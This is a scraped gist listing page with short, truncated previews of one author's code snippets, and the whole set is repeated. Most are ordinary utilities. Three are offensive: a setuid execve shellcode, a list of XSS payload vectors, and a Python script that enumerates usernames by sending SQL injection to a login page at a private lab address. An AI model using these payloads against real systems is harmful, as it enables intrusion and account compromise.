rastating

## create-react-component.js
#! /usr/bin/env node
# Usage: node create-react-component.js ComponentName
# Note: If a `components` directory does not exist in the current working directory, nothing will be created

const fs = require('fs')
const path = require('path')
const componentName = process.argv[2]
const componentPath = path.join(
  'components',
  componentName

## tcp-proxy.sh
#!/bin/sh -e

if [ $# != 3 ]
then
    echo "usage: $0 <src-port> <dst-host> <dst-port>"
    exit 0
fi

TMP=`mktemp -d`
BACK=$TMP/pipe.back

## 99_bottles_of_beer_on_the_wall.asm
global _start

section .text
  _start:
    xor   ecx, ecx
    mov   cl, 0x63

    song:
      mov   eax, ecx
      call  convert_to_ascii

## setuid_execve_shell.c
/*
Title   : Linux i686 setuid(0) execve shell (30 bytes)
Author  : rastating

08048060 <_start>:
 8048060:	31 db                	xor    %ebx,%ebx
 8048062:	8d 43 17             	lea    0x17(%ebx),%eax
 8048065:	cd 80                	int    $0x80
 8048067:	31 c9                	xor    %ecx,%ecx
 8048069:	31 d2                	xor    %edx,%edx

## yardoc_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rastating
                / yardoc_cheatsheet.md
            
            
              Created
              June 27, 2018 20:53
                — forked from chetan/yardoc_cheatsheet.md
            
              
                YARD cheatsheet
              
          
      View yardoc_cheatsheet.md
  
      
    YARD CHEATSHEET http://yardoc.org
cribbed from http://pastebin.com/xgzeAmBn
Templates to remind you of the options and formatting for the different types of objects you might
want to document using YARD.
Modules
Namespace for classes and modules that handle serving documentation over HTTP

  
## xss_vectors.txt
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

## monzo_to_qbo.py
from dateutil.parser import parse
import pandas as pd
import csv
import sys

if len(sys.argv) == 1:
    print "Usage: monzo_to_qbo.py [path to Monzo csv export]"
    exit(1)

RED   = "\033[1;31m"

## opendocman_database.sql
# MySQL dump of OpenDocMan
#
#--------------------------------------------------------

#
# Table structure for table 'odm_access_log'
#

CREATE TABLE `odm_access_log` (
  `file_id` int(11) NOT NULL,

## user_enum.py
import requests
import sys

with open(sys.argv[1], 'r') as f:
  for line in f:
    sys.stdout.write("Trying username: %s                                  \r" % line.strip())
    sys.stdout.flush()
    r = requests.post("http://10.2.0.104/checklogin.php", data={ 'myusername' : line.strip(), 'mypassword' : "'or'a'='a", 'Submit' : 'Login' }, allow_redirects=True)
    if r.text.find("Oups, something went wrong") == -1:
      print "++ Found user %s ++" % line.strip()

## sha1check.sh
#!/bin/bash

if [ "$#" -ne 2 ]
then
  echo "Usage: sha1check [filename] [checksum]"
  exit 1
fi

echo "$2 *$1" | sha1sum -c -
	#! /usr/bin/env node
	# Usage: node create-react-component.js ComponentName
	# Note: If a `components` directory does not exist in the current working directory, nothing will be created

	const fs = require('fs')
	const path = require('path')
	const componentName = process.argv[2]
	const componentPath = path.join(
	'components',
	componentName
	#!/bin/sh -e

	if [ $# != 3 ]
	then
	echo "usage: $0 <src-port> <dst-host> <dst-port>"
	exit 0
	fi

	TMP=`mktemp -d`
	BACK=$TMP/pipe.back
	global _start

	section .text
	_start:
	xor ecx, ecx
	mov cl, 0x63

	song:
	mov eax, ecx
	call convert_to_ascii
	/*
	Title : Linux i686 setuid(0) execve shell (30 bytes)
	Author : rastating

	08048060 <_start>:
	8048060: 31 db xor %ebx,%ebx
	8048062: 8d 43 17 lea 0x17(%ebx),%eax
	8048065: cd 80 int $0x80
	8048067: 31 c9 xor %ecx,%ecx
	8048069: 31 d2 xor %edx,%edx
	%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
	from dateutil.parser import parse
	import pandas as pd
	import csv
	import sys

	if len(sys.argv) == 1:
	print "Usage: monzo_to_qbo.py [path to Monzo csv export]"
	exit(1)

	RED = "\033[1;31m"
	# MySQL dump of OpenDocMan
	#
	#--------------------------------------------------------

	#
	# Table structure for table 'odm_access_log'
	#

	CREATE TABLE `odm_access_log` (
	`file_id` int(11) NOT NULL,
	import requests
	import sys

	with open(sys.argv[1], 'r') as f:
	for line in f:
	sys.stdout.write("Trying username: %s \r" % line.strip())
	sys.stdout.flush()
	r = requests.post("http://10.2.0.104/checklogin.php", data={ 'myusername' : line.strip(), 'mypassword' : "'or'a'='a", 'Submit' : 'Login' }, allow_redirects=True)
	if r.text.find("Oups, something went wrong") == -1:
	print "++ Found user %s ++" % line.strip()
	#!/bin/bash

	if [ "$#" -ne 2 ]
	then
	echo "Usage: sha1check [filename] [checksum]"
	exit 1
	fi

	echo "$2 *$1" \| sha1sum -c -